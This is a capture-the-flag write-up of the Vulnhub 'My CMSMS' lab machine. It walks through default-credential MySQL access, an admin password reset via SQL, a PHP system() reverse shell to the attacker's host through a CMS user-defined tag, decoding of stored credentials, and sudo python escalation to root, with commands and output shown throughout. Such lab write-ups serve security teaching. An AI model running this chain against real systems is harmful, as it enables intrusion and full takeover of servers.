Vulnhub - My CMSMS

Hi all, that was an awesome VM, easy but interesting.

You can find the machine there > My CMSMS

Enumeration/Reconnaissance

Let’s start always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ ip=192.168.1.9
$ nmap -sC -sV -p- -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-30 00:15 EEST
Nmap scan report for mycmsms.zte.com.cn (192.168.1.9)
Host is up (0.00038s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 27:21:9e:b5:39:63:e9:1f:2c:b2:6b:d3:3a:5f:31:7b (RSA)
|   256 bf:90:8a:a5:d7:e5:de:89:e6:1a:36:a1:93:40:18:57 (ECDSA)
|_  256 95:1f:32:95:78:08:50:45:cd:8c:7c:71:4a:d4:6c:1c (ED25519)
80/tcp    open  http    Apache httpd 2.4.38 ((Debian))
|_http-generator: CMS Made Simple - Copyright (C) 2004-2020. All rights reserved.
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Home - My CMS
3306/tcp  open  mysql

Mysql allows remote connections, that’s great! So mysql default credentials are root:<no_password> let’s try that :

1
2
3
$ mysql -u root -h $ip -p
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'xxxxx' (using password: NO)

Damn, then i had another idea to test for root:root :

1
2
3
4
5
6
7
8
9
10
11
$ mysql -u root -h $ip -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 101
Server version: 8.0.19 MySQL Community Server - GPL

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> 

Admin’s password change using mysql

That worked! Now on port 80 runs CMS Made Simple with mysql we can change admin’s password! I found a great guide

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| cmsms_db           |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.007 sec)

MySQL [(none)]> use cmsms_db;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [cmsms_db]> show tables;
+--------------------------------+
| Tables_in_cmsms_db             |
+--------------------------------+
| ..junk tables..                |
| cms_userprefs                  |
| cms_users                      |
| cms_users_seq                  |
| cms_version                    |
+--------------------------------+
53 rows in set (0.004 sec)

MySQL [cmsms_db]> select * from cms_users;
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
| user_id | username | password                         | admin_access | first_name | last_name | email             | active | create_date         | modified_date       |
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
|       1 | admin    | fb67c6d24e756229aab021cea7605fb3 |            1 |            |           | admin@mycms.local |      1 | 2020-03-25 09:38:46 | 2020-03-26 10:49:17 |
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
1 row in set (0.001 sec)

MySQL [cmsms_db]> 

Let’s change his password now :

1
2
3
4
MySQL [cmsms_db]> update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'pwned'))) where username = 'admin'
    -> ;
Query OK, 1 row affected (0.005 sec)
Rows matched: 1  Changed: 1  Warnings: 0

Now we can login in, admin panel is under /admin -> admin:pwned

Shell as www-data

Now i stucked for lot of minutes, i was like how the fuck can i take a reverse shell. Isn’t wordpress/joomla or something similar after lot of enumeration and tries i found a way :D Follow my steps, this can be useful for future CTFs :)

Now we can see the results under : http://$ip/index.php?page=user-defined-tags

We can simply add a reverse shell now :

1
system("bash -c 'bash -i >& /dev/tcp/$your_ip/5555 0>&1'");
1
2
3
4
$ nc -lvp 5555
listening on [any] 5555 ...
www-data@mycmsms:/var/www/html$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@mycmsms:/var/www/html$ 

www-data -> armour

Now privesc is really easy, under /admin we can see this :

1
2
3
4
5
6
7
www-data@mycmsms:/var/www/html/admin$ ls -la
ls -la
total 340
drwxr-xr-x  6 www-data www-data  4096 Jun 24 20:12 .
drwxr-xr-x 10 root     root      4096 May 31 04:09 ..
-rw-r--r--  1 www-data www-data   472 Mar 26 03:48 .htaccess
-rw-r--r--  1 www-data www-data    45 Jun 24 20:12 .htpasswd

.htpasswd contains a base64/base32 encoded string.

1
2
3
4
5
6
7
8
9
10
11
www-data@mycmsms:/var/www/html/admin$ cat .htpasswd
cat .htpasswd
TUZaRzIzM1ZPSTVGRzJESk1WV0dJUUJSR0laUT09PT0=
www-data@mycmsms:/var/www/html/admin$ echo TUZaRzIzM1ZPSTVGRzJESk1WV0dJUUJSR0laUT09PT0= | base64 -d | base32 -d
armour:Shield@123

www-data@mycmsms:/var/www/html/admin$ su - armour
su - armour
Password: Shield@123

armour@mycmsms:~$ 

armour -> root

Now if we check sudo -l we can see that we can run python as root :

1
2
3
4
5
6
7
8
9
10
11
12
13
armour@mycmsms:~$ sudo -l
sudo -l
Matching Defaults entries for armour on mycmsms:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User armour may run the following commands on mycmsms:
    (root) NOPASSWD: /usr/bin/python
armour@mycmsms:~$ sudo python -c 'import pty; pty.spawn("/bin/bash")'
root@mycmsms:/home/armour# whoami;id
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Was fun, enjoyed a lot! :D